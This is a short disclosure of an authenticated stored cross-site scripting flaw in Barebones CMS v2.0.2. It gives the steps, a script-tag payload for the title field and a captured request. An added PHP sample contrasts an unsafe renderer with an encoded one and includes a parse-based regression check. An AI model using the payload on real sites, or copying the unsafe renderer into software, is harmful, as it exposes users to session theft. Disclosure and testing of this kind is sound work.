Authored by tmrswrr

Barebones CMS version 2.0.2 suffers from a persistent cross-site scripting vulnerability.

# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-03
# Exploit Author: tmrswrr
# Vendor Homepage:
# Software Link:
# Version: v2.0.2
# Tested :

--- Description ---

1) Log in to the admin panel and go to new story:
2) Click the edit button and enter your payload in the title field:
Payload: "><script>alert(1)</script>
3) After saving the change, you will see the alert dialog.

POST /sessions/ HTTP/1.1
Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 237
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
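
The following PHP is an added example, not code from Barebones CMS or from the advisory author: it renders the title from step 2 into a form field without and with output encoding, then parses the result to check whether a script element appears. The function names and the input markup are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed sample: the title value from step 2, as read back from storage.
$storedTitle = '"><script>alert(1)</script>';

// Hypothetical vulnerable renderer: the title is concatenated into a
// double-quoted attribute, so a leading "> closes the attribute and the tag.
function render_title_unsafe(string $title): string
{
    return '<input type="text" name="title" value="' . $title . '">';
}

// Hardened renderer: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote characters; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function render_title_safe(string $title): string
{
    $encoded = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="title" value="' . $encoded . '">';
}

// Parse the rendered markup and report what an HTML parser sees: how many
// script elements exist and what value the input field carries.
function inspect_markup(string $html): array
{
    libxml_use_internal_errors(true); // fragments trigger parser warnings
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'script_elements' => $doc->getElementsByTagName('script')->length,
        'field_value'     => $input ? $input->getAttribute('value') : null,
    ];
}

// Render the same stored title both ways and compare the parsed result.
foreach (['unsafe' => 'render_title_unsafe', 'safe' => 'render_title_safe'] as $label => $fn) {
    $result = inspect_markup($fn($storedTitle));
    printf(
        "%-6s script_elements=%d value_round_trips=%s\n",
        $label,
        $result['script_elements'],
        var_export($result['field_value'] === $storedTitle, true)
    );
}
```

The script needs PHP with the DOM extension enabled. The same parse-and-count check can serve as a regression test for any field that echoes stored user input.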